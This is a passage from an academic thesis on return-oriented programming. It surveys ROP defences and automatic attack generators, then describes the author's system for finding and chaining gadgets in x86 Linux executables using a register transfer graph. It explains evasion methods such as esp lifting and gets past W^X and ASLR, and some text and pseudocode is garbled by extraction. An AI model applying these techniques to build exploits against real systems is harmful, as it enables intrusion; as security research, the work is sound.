ing systems [10]. The author used a compiler based approach to generate the FreeBSD

kernel without returns, and without return opcodes. Instead of using the traditional

call convention where the return address is pushed on the stack, a return index

is pushed on the stack. This index corresponds to an index in a centralized return

address table, containing all valid return addresses permitted in the kernel. Once

return is invoked, the return index is popped from the stack, and the control flow

of the program is subverted to the corresponding return address. As there are finite

number of call instructions within the kernel implementation, the return address

table is static, and therefore it can be pre-generated according to the locations of the

call instructions.

The implementation of the approach, systematically changes each call and returninstructions with functionality to push a return index on the stack, and restore the

index value stored in the return addresses table, effectively removing all return in-

structions within the kernel. However, the control flow of the kernel is now being

subverted using jmp instruction, resulting in increased number of jmp instruction in

the binary logic of the kernel. As the approach does not ensure resilience towards

Jump Oriented Attacks, the increased number of jmp instructions enrich the set of

15

Chapter 2. Background

JOP gadgets, proving additional opportunities in favour of JOP attackers. Although

this system defeats the known return oriented rootkits at that time, it does not provide

a full-proof and generic protection against all variations of ROP attacks.

2.4.3 HyperCrop

HyperCrop [11] is hypervisor i.e. Virtual Machine Manager (VMM) approach to defeat

x86 return oriented programming attacks, built on top of the XEN hypervisor [40]. In

this context the use of the VMM is to intercept stack writes that occur along program

execution, and inspect the content on the stack to determine the thread of a ROP

attack. The system works such that in the initial step, gadgets addresses are extracted

from the binary / library which is protected by the system. The addresses represent a

set of gadget addresses which can be potentially used by an attacker in a ROP scenario.

During the execution of the program 400 bytes are copied from the top of the stack,

which correspond to 100 32bit entries on the stack. Finally each 100 entries are then

cross-referenced against the predefined set of potential gadget addresses. If the ratio

of the number of entries that correspond to the set of potential gadget addresses

against the total number of entries is above carefully chosen threshold, then the system

assumes the potential thread of a ROP attack.

The analysis of the system introduced a performance overhead of 1.4, suggesting that

the system is practical to use to defend against ROP attacks. However the approach has

several limitations. As the binary size of different programs / libraries vary according

to their code base, the threshold used as a heuristic to determine the potential of a

ROP attack must be calculated and normalized for each individual program / library.

Furthermore, each time a program / library is updated and recompiled, the set of

potential gadget addresses must be updated, and, as the cardinality of the set of

potential gadgets can potentially chance, the threshold must be recalculated again.

This makes the system tedious to use and infeasible for deployment on a large scale.

Second problem is the heuristics based on a pre-determined threshold. As the system

only analyses 100 entries from the stack, an attacker can use the so called esp lifting

technique [31], to increase the value of esp with the use of a single gadget. Single

increment of esp will execute to the next gadget available on the stack in a ROP attack.

And if esp is increased by a particular value x, then the CPU will execute the gadget

located at address which resides on the stack position esp+x. This technique can

basically jump over the stack, creating holes inside, which can be filled with bogus

values. If the attack is crafted such that those bogus values do not correspond to

gadget addresses, the ratio of potential gadget addresses against total entries in the

stack can be reduced bellow the value of the threshold, bypassing the HyperCrop

16

2.4. Defence Techniques

detection.

Finally HyperCrop is defenceless against jump oriented programming attacks, since

this types of attacks do not rely on the stack values for control flow retention.

2.4.4 ROPdefender

ROPdefender [12] is a neat technique able to defend against the traditional ROP

attacks using a binary instrumentation framework [41]. The implementation of this

approach is build on top of Pin utilizing the VM emulation unit and just in time

compiler unit to build a shadow stack, similar to the one used in StackGhost [42].

When a call or return instruction occurs, ROPdefender uses the inspection routines

provided by Pin to intercept the instructions. Once a call is encountered, the return

address is pushed on the shadow sack. And when a return instruction occurs, a check

is enforced between the return address the stack pointer points to (i.e., the return

address on the program stack) and the saved return address placed on top of the

shadow stack. If the values do not match, then a ROP attack is detected.

Since the fundamental set of circumstances that make return oriented programming

possible is having the return addresses written on the same stack where arbitrary data

is placed, the approach to keep a copy of the return addresses in a shadowing stack

is quite an elegant solution to avoid ROP attacks. However, the greatest drawback of

ROPdefender is the performance overhead, which in the worst case introduces 3.54

times slowdown then compared to a normal execution of a program. Although most

of it results as a consequence of the performance overhead of Pin, the only feasible

deployment scenario on a large scale would be implementation of ROPdender logic

on the hardware level. Still, similarly to the HyperCrop model, ROPdefender does not

provide mechanism to defend against ROP attacks based on indirect jumps. Since

indirect jumps do not disrupt the calling sequence inside a running program, the

shadow-stack verification of return addresses is futile.

2.4.5 G-Free

G-Free [13] is another system aiming to provide a system to address the wide range

of common code reuse attacks. It focuses on securing libc library to prevent return-

into-libc attacks, by keeping the attacker of reusing existing fragments of code as

basic building blocks. The protection addresses both the intended and unintended

instructions. The protection for the latter is achieved using code rewriting techniques

to remove unintended instructions by aligning instructions using alignment sled,

17

Chapter 2. Background

sufficiently large instruction sequences, having no effect once executed. Combined

with removal of occurrences of the c3 and c2 bytes, the system reduces the number

of unintended gadgets in libc. To protect the intended instructions from being

reused as gadgets, the system incorporates return address protection, by introducing

instructions header to encrypt the return address pushed on the stack and instructions

footer to decrypt the return address before return instruction occurs.

The system also provides protection against indirect jumps and demonstrates a solid

protection against traditional ROP and all its variations, with a very small performance

overhead of about 5.6% in the worst case. Nevertheless, it is quite difficult to recognize

how the system performs on intensive benchmarks, since the performance evaluation

addressed use-cases where the control flow was not the most crucial part (IO-bound

and kernel based workloads). Regardless of the fact that G-Free provides a comprehen-

sive solution to defend against ROP attacks, it has been attested only as a prototype,

furnishing ROP protection within the implementation of libc. The low deployment

of the principle on a large scale of software across different architectures, operating

systems and user-end applications, leaves the thread of ROP in the heart of security

problems.

2.4.6 Control Flow Integrity

Control Flow Integrity [14] is a code rewriting technique, that incorporates lightweight

static verification to instrument runtime checks to prevent code reuse attacks. As

changing the control flow of the program is the essence in the ROP based exploits,

this technique ensures that a program follows its control flow graph (CFG), generated

ahead of time. The implementation is based on modified XFI [43], to support the

so-called individual label instructions that indicate the beginning of a particular

function, without affecting its semantics (prefetch instruction). During the execution

of a program, the system checks whether the labels point to a valid branch instruction,

and when a function returns the system also checks whether the pointer point to a

valid return address, constraining the binary to follow an expected control flow.

The rewriting engine of XFI, analyses the binary and finds all branching instructions.

According to this analyses, the system preforms the code rewriting instrumenting the

branching instructions to enforce the CFG program flow. Unfortunately the drawback

as a result of the binary analysis, is the fact that this system is addressing intended

instructions only. Having a ROP attack crafted with gadgets consisted of unintended

instruction, will eliminate the ability to verify that a return address points to a valid

label instruction. Furthermore, the performance overhead introduced by this system

(∼45% in the worst case) is an additional reason why this system has not seen any

18

2.4. Defence Techniques

significant production deployment.

A follow up work, sharing the same fundamentals of CFI is the control flow locking

(CFL) system [15]. Unintended instructions are removed using already existing tech-

nique - software fault isolation [44]. Instead of introducing label instructions to detect

control flow violation before it occurs, CFL lazily detects the violation, after the trans-

fer occurs. This is done by performing a lock operation before each indirect control

flow transfer, with a corresponding unlock operation present at valid destinations

on binaries and static libraries. The work presented in this system, fills in the gaps

originating from the initial work of CFI. The low performance overhead ((∼23% in

the worst case), provides competitive results towards any other defence mechanisms

dealing with code-reuse attacks. Although the technique can be easily ported to sup-

port dynamically linked libraries, giving the opportunity to defend against code-reuse

attacks, the low deployment of the system makes the use of ROP attacks plausible.

19

3 Related Work

Section 2.4 gives an overview of the available defence techniques against ROP attacks,

their flaws and deployment rate and clearly shows that return oriented programing is

a crowded, important research area. It also demonstrates the inability to provide an

extensive defence mechanism against all ROP attacks, as the mechanisms developed

along the way only resembled piecemeal defences to address each new variant of code

reuse attack, as it occurs.

On the other hand, the evolution of defence techniques was also contentiously ini-

tiating new approaches to develop attack techniques to defeat the widely deployed

security systems. As a result, the attacker were becoming increasingly sophisticated,

and harder to create. At the same time, different architectures, different operating

systems, diverse distribution and applications was additional incentive for attackers

to develop tools to automatize the creation of code reuse attacks, enabling them to

target the wide areas of users using different systems.

The recent work in ROP attacks clearly shed lights on the danger conveyed of these

attacks. Apart from developing defence techniques, attackers also used tricks and

methods to disguise the generated attacks, by creating polymorphic variants, packed

payload, and even ASCII printable payloads [36] to evade non-ASCII filtering. In the

following sections we describe the current tools and methods to create automatic

ROP attacks, portable on different systems and architectures. As the attackers can

potentially have unlimited use of imagination to fork different ideas, we only address

the known techniques in the academic world.

21

Chapter 3. Related Work

3.1 Q

Q proposes software verification techniques to automatically create ROP attacks [16].

The system is also able to harden existing exploits. In this context hardening denotes

the process of rewriting the logic of the exploit to bypass W⊗

X and ASLR, assuming

that the exploit is unusable when those defences are enforced. We concentrate on the

automatic generation of ROP attacks. A Q exploit is constructed in several stages:

1. Gadget Discovery. This stage locates predefined table of gadgets types preform-

ing arbitrary binary operations, accessing memory, branching instructions,

arithmetic operations, and gadgets moving data from one register to the other.

Q required the gadgets to be constrained to have know side effects, constant

stack offset and able to transfer the execution control to the next gadget. For

each gadget the weakest precondition and strongest postcondition are specified.

Then the gadget is semantically checked to determine whether it matches one

of the predefined gadget types.

2. Gadget Arrangement. In this stage, instruction selection is performed, in order

to implement a given computation. Having many ways of combining gadgets to

produce a particular computation, the instruction combination in this context

is represented by different gadget arrangements.

3. Gadget Assignment. Once different gadget arrangements are considered, Q

determines if a gadget arrangement can be satisfied. The algorithm in this

context iterates through possible arrangements and schedules, to verify whether

the arrangement satisfies the desired computation.

4. Gadget Output. Once gadget arrangements are found to have satisfiable assign-

ments, Q prints the bytes of the payload.

The produced attack is able, to either call function that resides in the target binary,

call external function in libc, or write four bytes to an arbitrary address. Results

showed that Q is able to generate exploits for more than 80% of the binaries locating

in /usr/bin/, having size of at least 20KB. Despite the good results in exploit creation,

Q has rather practical goals, involving generation of traditional ROP exploits, as it

provides the features to execute internal and external functions. Traditional ROP

exploits involve calling function as system to lunch a shell, or call mprotect, to disable

W⊗

X and proceed with exploit containing executable machine code. Therefore the

success and complexity of a Q generated exploit relies on the existing internal and

external functions. Q is unable to generate higher level attacks, as its goals do not

involve generating a Turing complete set of instructions.

22

3.2. Return Into libc Attacks

3.2 Return Into libc Attacks

On the Expressiveness of Return-into-libc Attacks (RILC) [17] is a splendid demonstra-

tion on the Turing completeness (TC) of the return-into-libc attacks. It enfolds a

decade of using RILC in creating code reuse attacks, overturning general misconcep-

tion that RILC attacks are not Turing complete. Without focusing in depth on the

implementation, the research work concentrates on combining functions from libcto ensure RILC functionality to provide:

• General arithmetic and logic operations

• Memory accesses

• Branching

• System calls

Each of the RILC functionalities mentioned above, are implemented with POSIX

complaint functions available across different operating systems. It also incorporates

the presence of other function in the mostly POSIX complaint environments (such as

Windows). To demonstrate Turing completeness, the system builds a turing machine

simulator on Debian and Windows XP. Although the ROP attacks using this approach

are still built manually, the well defined POSIX standard in the C library, having

consistent interface, can provide attacks that require only minor modifications to be

ported on cross OS systems (changing the function offsets). Furthermore, as many

application depend on the standard interface implementation of the libc, it is quite

dificult to simply remove any subset of instruction of lib, or even modify the interface.

However, in comparison with standard ROP attacks this approach has certain disad-

vantages. Namely, the ROP payloads defined by RILC are significantly larger, due to

many function calls. Furthermore, the efficiency of the payload is also significantly

reduced. The comparison of a simple Turing machine simulator built in C, with its TC-

RILC ROP counterpart, yields results where TC-RILC is 2000 time slower. Finally, this

technique does not apply on operating systems where libc is missing, or applications

where libc is not used.

3.3 Reverse Engineering Intermediate Language

Reverse Engineering Intermediate Language (REIL) [18] is a framework that provides

automatic gadget search across different CPU architectures. The gadget search is

23

Chapter 3. Related Work

implemented such that the system searches for pre-determined instruction templates

(REIL representation). Each of the instruction templates are specified manually, and

the gadget search algorithm finds single gadget performing the operation specified

by the template. Similarly to the RILC work, the templates are defined such that

the operations perform arithmetic, logical and bitwise operations and data transfer

instructions. The aim of the REIL framework is to ensure Turing completeness, by

finding sufficient gadget instructions to implement the ultimate reduced instruction

set computer (URISC) [45]. It operates in three stages:

1. Stage I uses similar approach as the Galileo algorithm to extract gadgets. Once

a gadget is found, its REIL representation is determined corresponding to the

predefined templates.

2. Stage II analyses the extracted gadgets and gathers informations of the effects

induced by executing the instructions occurring in each gadget. This infor-

mation is represented by generating expression trees on the semantic of the

gadget.

3. Stage III performs the gadget search. All potential gadgets obtained from the

previous stages are organized as expression trees. A core search algorithm

compares the expression trees of every potential gadgets to expression trees that

reflect a particular operation. If all conditions are met for a potential gadget,

then the gadget is included in a list of specific gadgets. Finally, the complexity of

the gadget is calculated. The last process is two fold. In the first step it analyses

the registers and memory locations affected by the use of the gadget. In the

second step it analyses the complexity of the gadget by counting the nodes of the

expression trees of the gadget. The second analysis minimizes the complexity

of instructions to satisfy particular operation.

The framework provides an extensive gadget search taking into consideration architec-

ture dependent characteristics, making it available across ARM, SPARC, PowerPC and

MIPS architectures. It also successfully builds a Turing complete sets of operations

on Windows Mobile, iOS and Symbian, taking into consideration common libraries,

such as coredll, libsystem and euser. However this system heavily depends on the

presensce of common libraries. Similar to the RILC model, this technique ensures the

Turing completeness, assuming that common libraries are likely to have enough gad-

gets able to match the predefined template operations. Having REIL to automatically

construct a ROP attack will require much extensive overlook in the side effect inflicted

by the use of the gadgets to fully automatize the generation of the attack.

24

3.4. Return Oriented Rootkits

3.4 Return Oriented Rootkits

Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms [19]

is the only related work that provides fully automatic generation of return oriented

attacks, targeting the Windows kernel. As the logic of the rootkit is implemented using

return oriented programming, we focus on the generation of the attack. The system is

consisted of 3 modules:

1. Constructor. This module proceeds in two steps. In the first step, it searches

for single instructions, followed by a free branch instruction. The search is

focusing on predefined set of instruction, characterised as useful instruction. In

the second step, the construction chains gadgets together, to form structured

gadgets designated to perform basic operations (logical, arithmetic, control flow,

stack manipulation and bitwise operations). In order to find all the necessary

gadgets to perform the operation, as well as to control the which registers are

modified when a particular gadget is used, a set of CPU registers is specified

- working registers. Finally the constructor merges gadgets having instruction

operating with the worker registers to perform particular operation.

2. Compiler. This building block takes into consideration the gadgets provided

by the constructor, and a higher level source code, and produces the attack

payload. The source code is written in a dedicated C-like language. In this stage,

the compiler chains the gadgets generated from the constructor to implement

the semantics given in the source code.

3. Loader. The output generated from the compiler results into generation an

exploit having the relative addresses of the program image. The loader adjusts

the offsets of the addresses, and resolves them into absolute addresses.

The system has shown to automatically generate exploits across different Windows

OS kernels, as well as to provide a good runtime overhead of the exploits and rather

small sized payloads. However this technique by all means is not a comprehensive

solution towards automating ROP attacks. The most considerable drawback is the

search of a single-instruction gadgets. The binary code of typical OS kernel is very

likely to contain huge sets of gadgets that have single instruction as a result of its

binary code magnitude. Therefore, it is possible to match all useful instruction defined

in the context of this work. Nevertheless, this commodity can only be expected

in OS kernels and potentially common libraries. On the other hand, some widely

develop application in their binary code do not particularly provide even the basic

set of arithmetic, bitwise or logical single-instruction gadget. Closely looking at the

25

Chapter 3. Related Work

implementation details of the construction, we can note that the working register

set is restricted on three registers only, namely eax, ecx and edx. This significantly

reduces the flexibility of the gadget search and gadget chaining, as it is very hard to

find gadget operating exclusively on the specified registers, when the system is used

outside the OS kernel.

26

4 Automatic Return Oriented Program-ming

Chapter 3 gives an overview of the available techniques and approaches in automatic

generation of code reuse attacks. Each of the techniques focuses on set of common

libraries or operating system kernels. The convenience of creating attack techniques

on large chunks of machine code found in kernels and common libraries, is the

resulting rich set of gadgets. Therefore, most of those technique rely on predefined

set of template instruction and register sets looking for a single instruction gadgets,

assuming that the common library or operating system kernel are likely to have all

required gadgets. However this approach does not apply on reduced set of gadgets,

often found in small libraries, and stand-alone executables.

Our focus in this work are stand-alone executables. As previously discussed, the

traditional way of crafting a ROP attack is by invoking mprotect to disable the W⊗

X

protection on the system and inject random code, or invoking execve to start a remote

shell on the target machine. Despite the fact that those functions are available across

different operating systems and distributions, a stand-alone binary does not necessary

need to be linked against system libraries. Therefore exploiting a vulnerability requires

making use of the gadgets already available in the binary. To make the best out of the

available gadgets, we observe:

1. If there is no gadget available that does a particular logical or arithmetical

operation we might be able to find suitable substitution.

2. If there is no gadget and no substitution, then that particular operation will not

be available in the ROP attack.

3. If there are only few gadgets available, then gadget chaining requires to move

the data between registers, such that the result of one operation can be used as

an input to the next operation.

27

Chapter 4. Automatic Return Oriented Programming

The first observation proposes that if a gadget having inc functionality is not available

in the system, it might be possible to substitute it with a gadget having add functional-

ity. However, if inc and add functionality gadgets are not available in the executable,

then this operation will be unavailable in the attack according to the second observa-

tion. In order to illustrate the third observation, we assume that an executable is given,

having the gadgets on Figure 4.1. We would like to use the three gadgets to calculate:

edx = edx - ebp - ecx

0xb9268970: add ebp, ecx ret

0x42295cee: sub eax, edx inc [esi+0x5D5B]

ret

0x42295cee: mov ecx, eax ret

Figure 4.1: Available gadgets

Although the simplest implementation of this calculation is using sub ebp, edx;sub ecx, edx, those gadgets are not available in the system. Thus, the sum of ebpand ecx is calculated first, and then the result is subtracted from edx. However to do

this, we need to pass the result from the first computation as input to the next gadget

using a mov instruction gadget (Figure 4.2)

0xb9268970: add ebp, ecx ret

0x42295cee: sub eax, edx inc [esi+0x5D5B]

ret

0x42295cee: mov ecx, eax ret

1

3

2

Figure 4.2: Simple gadget chaining

28

4.1. Process Image Analysis

There are 8 32 bit CPU registers. Having in mind that each instruction having two

operand can use any of the 8 CPU instruction, there are 64 possible combinations for

every computation (arithmetic, logical, etc). The number significantly increases, when

one of the operands is a memory segment, taking into consideration the base register,

displacement value etc. To be able to chain as many gadget as possible, we need to

know the data transfer relation between each of the registers in the system, as well

as memory. This data transfer relations also depend on the available gadgets in the

target executable. However, the reduced set of gadgets, significantly reduces the set

of single instruction gadgets, and gadgets of several instruction must be considered.

Subsequently the use of multi-instruction gadgets can cause unwanted side-effects,

which must be eliminated or taken into consideration.

In the following sections, we provide a description of system that automatize the

creation of ROP attacks in stand-alone executables on x86 architecture, using Linux as

an operating system. The system is consisted of several phases:

1. In the initial phase of the system, we dissemble the the target executable and

extract the raw bytes of the available gadgets.

2. The next phase considers the side effects imposed by the gadgets, and classifies

the extracted gadgets according their semantics.

3. We generate the register transfer graph to describes the relations between data

transfers of each CPU registers and memory.

4. Finally in the last phase, we use the register transfer graph to provide a compre-

hensive method to perform gadgets chaining.

Being aware of the CPU register interconnection, our system can introduce flexibility

on the set of CPU registers being used in the ROP attack, to avoid predefined sets

of registers, as seen in other systems. In addition, the flexibility in the register set

will narrow the search of gadgets performing particular operations, and contribute

towards creation in automatic ROP attacks by avoiding operation templates.

4.1 Process Image Analysis

The first step towards automating the gadget search, is extracting the machine code

of the target program. This can be done by dissembling the executable file of the

program, or by disassembling the binary code of the program when it is loaded into

memory. Linux (as many other Unix-like operating systems) provides a mechanism

29

Chapter 4. Automatic Return Oriented Programming

that describes each region of contiguous virtual memory in a process or thread. As

a result of simplicity of this mechanism (reading into /proc/[pid]/maps), we disas-

semble the program when it is loaded into memory.

0x00000000

Data Segment

BSS segment

Heap

Stack

Text Segment

Memory Mapping

Figure 4.3: Memory Lay-out of a Linux process

When a Linux process is loaded into memory, the OScreates different sections, containing executable code,static or dynamic data (illustrated on Figure ??). Itrandomizes the stack, heap, and shared libraries, butnot the program image (text, data & bss segments)[8]. Therefore the address offsets of the gadgets foundin the text section remain unchanged even when ASLRis enabled. On the other hand, when ASLR is disabled,the shared libraries will always be mapped to the sameregions, having constant address offsets in the librarygadgets, on every program invocation.

Programs can be manually compiled into position in-dependent executables (PIEs) and loaded to multiplepositions in memory. and many third-party applica-tions (including Mozilla Firefox) are deployed as PIE(having the program logic wrapped in a shared library).However modern distributions only compile selectivegroup of programs as PIEs, because doing so introducesa performance overhead at runtime.

In our implementation we use the fact that the text segment remains unchanged to

search for gadgets in this section. For the systems where ASLR is disabled, we ensure

that the implementation takes into consideration all executable sections. Simple

invocation of /proc/[pid]/maps will result with the following listing (inspecting

init process by reading the contents of /proc/1/maps):

08048000-08051000 r-xp 00000000 08:06 7209157 /sbin/init08051000-08052000 r--p 00008000 08:06 7209157 /sbin/init08052000-08053000 rw-p 00009000 08:06 7209157 /sbin/init08053000-08074000 rw-p 00000000 00:00 0 [heap]b7556000-b7557000 rw-p 00000000 00:00 0b7575000-b76db000 r-xp 00000000 08:06 5243163 /lib/libc-2.11.3.sob76db000-b76dc000 ---p 00166000 08:06 5243163 /lib/libc-2.11.3.sob76dc000-b76de000 r--p 00166000 08:06 5243163 /lib/libc-2.11.3.sob76de000-b76df000 rw-p 00168000 08:06 5243163 /lib/libc-2.11.3.sob7731000-b7732000 rw-p 00000000 00:00 0b7732000-b7751000 r-xp 00000000 08:06 5243156 /lib/ld-2.11.3.sob7751000-b7752000 r--p 0001e000 08:06 5243156 /lib/ld-2.11.3.so

30

4.2. Gadget Locations

b7752000-b7753000 rw-p 0001f000 08:06 5243156 /lib/ld-2.11.3.sobff91000-bffb2000 rw-p 00000000 00:00 0 [stack]ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]

Using process traces (ptrace), we control the execution of the target program, and

inspect the internal state. PT_READ_I enables to read any section within the running

process. In this context, the text segment is simply the /sbin/init segment, marked

as r-xp. Once we are able to read the content of this section, we can process the data

into the gadget search algorithm. In systems where ASLR is disabled, all sections

marked as r-xp are taken into consideration.

4.2 Gadget Locations

The gadget search algorithm is performed on chunks of binary data. The algorithm

locates c2 and c3 bytes, as well as pop reg; jmp reg instructions, and backtracks to

a user defined threshold of bytes to find valid x86 instructions. A pseudo code of the

search algorithm is available bellow:

Algorithm 1 Gadget Search

Input: process segment as binary stream segOutput: list of gadgets

1: g ad g et s ←;2: for byte pos in seg do3: if i s_val i d_su f f i x(pos) then4: for i := 1 to thr eshol d do5: if x86_disasm(pos − i , pos) then6: add the gadget into g ad g et s7: end if8: end for9: end if

10: end for11: return g ad g et s

A threshold is necessary because otherwise all side effects of encountered instruc-

tions will make it infeasible to chain the gadgets. The implementation depends on

libdisasm library. In this context, x86_disasm used on line 5 in Algorithm 1 provides

basic disassembly of Intel x86 instructions from binary stream.

Each gadget obtained in the list will have a unique address. However, two or more

gadgets might as well perform identical instructions. To avoid having repetitive

31

Chapter 4. Automatic Return Oriented Programming

Algorithm 2 is_valid_suffix

Input: byte address posOutput: trueif a valid gadget suffix, otherwise false

1: if pos[0] = c3 or pos = c2 then2: return true3: end if4: if (p[0]⊗ 0xf8) = 0x58 and p[1] = 0xff and (p[2]⊗ 0xf8 ) = 0xe0 then5: if (p[0]⊗7) = (p[2]⊗7) then6: return true7: end if8: end if9: return false

gadgets, the machine code of each gadget is hashed, and test for existence is performed

before the gadget is added.

The threshold defined in the gadget search algorithm, can hold the bytes of several

instructions, and since the search algorithm backtracks from a free branch instruction,

very often happens that a gadget is a subset of another gadget, such that they differ

in the first few instructions. Therefore, in order to use every gadget possible, each

gadget is treated as a single instruction gadget, such that the first instruction is taken

into consideration only, regardless the number of following instruction until the free

branch instruction. Finally, it is only feasible to treat each gadget as single instruction

gadget if the side effects of the other instructions are taken into consideration.

4.3 Considering Gadget Side-Effects

In order to eliminate the side effects of each gadget, we must determine the change

of the sate that each instruction of the gadget makes. Take into consideration the

following example (obtained from section 2.1.2):

0xB7F9E479: mov %edi, %edx; incl 0x5D5B14C4(%ebx); ret

In order to use the gadget above as a single instruction gadget, taking into consid-

eration only mov %edi, %edx, we must ensure that incl 0x5D5B14C4(%ebx) will

increase the value of a know writeable location. Assuming that location 0x00000001 is

writeable and does not hold data used in the ROP attack, we can only use the gadget if

ebx is initialized to -0x5D5B14C3. In this context, we can resolve this issue, by using

pop gadget to initialize ebx with the value calculated before.

32

4.4. Gadget Classification

To address as many as possible of the known gadget side effects, we focus on the

following instruction types:

1. Memory Clobbering Instructions. This type of side effects are similar to the

example above. Generally speaking, memory clobbering can occurs, when a

gadget contains instruction between the first instruction and the free branch

instruction such that the target operand is a memory location. The memory

location is referenced by CPU registers. Therefore, the side effects of this type

of instructions can be removed by inserting pop gadgets to initialize the values

of the registers and designate the memory dereferencing to occur on a know

location. Having into consideration that the data segment has constant offsets

(as shown in section 4.1), several memory locations can be used in this section

as known clobbered locations. The only exception in this rule is when memory

clobbering occurs when the esp register is dereferenced. This is addressed in

the 3rd category.

2. Register Clobbering Instructions. Similarly to the previous case, this type of

instruction have the target operand as a register. In this case, we do not eliminate

the side effects, but we only mark the register clobbered by the instruction. In

special cases (mostly occurring in unintended instructions), where the target

operand of the first instruction in the gadget is a register being clobbered latter,

the gadget is being disregarded. In any cases, if the register being clobbered is

esp, the gadget is also disregarded.

3. Stack Modification Instructions. The side effects of this category are the most

critical, since the instruction of this type modify the stack, where the logic of

the ROP attack resides. Instructions that decrease the value of the stack pointer

can not be used (push, pusha, etc). This type of instructions modify the space

of the stack where the following gadget addresses are placed. Therefore the

gadgets having those instructions are disregarded. Gadget that increase the

value of the stack pointer can be used, by placing dummy values on the stack.

Note that gadgets having instruction of the type pop, popa, etc, which is not

the first instruction, fit in the 2nd category as well. Apart from introducing

additional dummy value on the stack, the clobbered register must be taken into

consideration.

4.4 Gadget Classification

Once each side effect is taken into consideration, the gadget can be classified accord-

ing to the first instruction. In our implementation we classify the gadgets into 13

33

Chapter 4. Automatic Return Oriented Programming

groups:

1. Stack manipulation: pop

2. Data transfer gadgets: mov, xchg,

les, lea, etc.

3. Arithmetic gadgets: add, sub, inc,

dec, shr, shl, etc.

4. Logic: and, or, xor, not, etc.

5. Control flow manipulation: jmp,

call, etc

6. Interrupts: int, int3, iret, into,

bound, etc.

7. Comparison: cmp, test, etc.

8. System calls: in, out, wait, ins,

etc.

9. Bit manipulation: btr, etc.

10. Flag manipulation: cld, clc, stc,

std, cmc etc.

11. Floating point unit manipulation:

fadd, fsub, fmul, fdiv, etc.

12. String manipulation: movs, cmps,

scas, lods, etc.

13. Other: nop

As this work targets stand-alone binaries, even rudimentary observation on the ob-

tained list of gadgets from stand-alone binaries. can depict the fact that the number

of gadgets in the first 6 groups is significantly surpassing the number of gadgets in

the other groups. This is due to the fact that most commonly used binaries do not

extensively use floating point manipulation, nor call interrupts or even system calls.

Consequently the implementation in this work, completely disregards the existence

of gadgets in groups 8 to 13.

Most frequently found gadgets are pop reg gadgets, in most cases addressing each 8

CPU registers. Less frequently gadgets are data transfer gadgets. And finally almost

every stand-alone binary has at least one of each of the arithmetic and logic gadgets.

The gadget classification notable narrows the gadget search space and is used in the

next step, namely the generation of the register transfer graph.

4.5 Building the Register Transfer Graph

The register transfer graph (RTG) is a directed graph representing the data movement

between CPU registers and memory. Each node in the graph represents either CPU

register or memory location referenced by register with or without a particular dis-

placement. Each edge on the graph represents a gadget that holds instruction to pass

the data from one node to the other. The edge labels represent the instruction used to

transfer the data between the nodes, and the registers stored in brackets represent the

34

4.5. Building the Register Transfer Graph

clobbered registers as a result of using the gadgets illustrated by the edge.

eax

ecx + 0x2be8

mov

edx + 0x8

mov [esi,edi,]

edi

mov [esi,edi,]

ecx

mov [ebp,]

edx

or

eax + 0x8

mov

ebx

xchg

esp

ebp

mov [ebp,]mov [ebp,]

esi

xchg

or

al

mov [ebx,]

dl

mov

eax

mov

ecx + 0x2344

mov

X X

Memory Add.CPU Register Data Movement

Figure 4.4: Apache/2.2.17 (Linux/SUSE) register transfer graph

The register transfer graph takes into consideration the data transfer gadgets, the

arithmetic and logical gadgets, such that:

• Data transfer gadgets. Once xchg and mov gadgets are found, those are inserted

directly in the graph as edges.

• Arithmetic gadgets. When add and sub gadgets are found, those are placed in

the graph only if the target can be initialized with 0. For the sake of simplicity

only pop gadgets are considered as initialization gadgets. The initialization

gadgets are used priori to the use of the data transfer gadget.

• Logical gadgets. Similarly to the previous group, logical gadget are also used

to transfer data between registers, only if the target can be initialized. If orgadget is used, the target is initialized with 0, if and gadget is used, the target

is initialized with 0xFFFFFFFF and if xor gadget is used the target is initialized

with 0.

The resulting graph will contain every data transfer between two nodes. Hence two

nodes might be connected by more than one edge. In order to optimize the generated

graph, the edges causing redundant side effects must be eliminated. On the other

hand, several nodes can load data from memory to a CPU register and the other way

35

Chapter 4. Automatic Return Oriented Programming

around. The number of these nodes can be reduced only to the most relevant memory

nodes. We illustrate this process in the following two sections.

4.5.1 Register Clobbering Edges

When two nodes in the graph have more than one edge, we look closely into the

register clobbering imposed by the edge gadgets.

eax

edx

mov [ebp, ecx, edi] mov [ebp, ecx, ebx]

Figure 4.5: Edges with different set ofregisters

eax

edx

or [ebp] mov [ebp, ecx] mov [ebp, ecx, ebx]

Figure 4.6: Edges having subset of clob-bered registers

To remove the redundant edges, we focus on the three cases:

• Two edges clobber different set of registers. This case is illustrated in Figure

4.5. The use of each edge in the graph generates different side effects. Therefore

both edges are then considered in the graph.

• The set of clobbered register of one edge is a subset of the clobbered registersof another edge. In this case, the edge with larger set of clobbered registers

imposes redundant side effects, and therefore it is disregarded. Note that having

an edge with no clobbered registers is just a special case of this rule. In the

context of Figure 4.6, edge “or [ebp]” will be the only edge considered for the

data transfers between edx and eax.

• Two edges have equal set of clobbered registers. In this case the data transfer

gadgets (xchg and mov) have precedence over the other gadgets. This is due to

the fact that this type of gadgets do not require initialization, and therefore are

more efficient to perform the data transfer.

36

4.6. Discovering Register Candidates

4.5.2 Memory Transfer Nodes

Having redundant memory transfer nodes occurs when several gadgets are found that

perform data transfer from memory to a register.

eax

ecx + 0x70

mov

ecx + 0x2344

mov

ecx + 0x2be8

mov

ecx + 0x5abx

mov

Figure 4.7: Memory transfer nodes transferring data to one register

To reduce the number created memory nodes, we select the nodes being dereferenced

by a particular register. The node having the lowest absolute displacement value is

then taken into consideration, and the rest of the nodes are disregarded. The choice for

having the lowest displacement, is only for convenience, since accessing the memory

value of that node will require proper initialization of the dereferencing register by

subtracting the displacement value.

4.6 Discovering Register Candidates

Once the complete graph is generated, we already have all data movements between

registers and memory. This gives the opportunity to chain gadgets, by transferring the

result from the result of using one gadget to the input of the other gadget. Therefore,

in order to narrow the search to the gadgets that are able to chain their execution, we

need to find the set of register candidates. This set will ensure that data transfers are

possible from each register to every other register in the set. In terms of graph theory,

this set of registers is simply the strongly connected component in the graph. Bellow

we provide a pseudo-code of the Tarjan algorithm to efficiently calculate the strongly

connected components:

Note in this case that every memory node in the graph, can connect to any other

memory node in any direction. This is because the data stored in the memory can be

referenced by both nodes, the one which transfer memory from register to memory

and the other way around. To serve that purpose, we slightly adjust the algorithm

37

Chapter 4. Automatic Return Oriented Programming

Algorithm 3 Tarjan

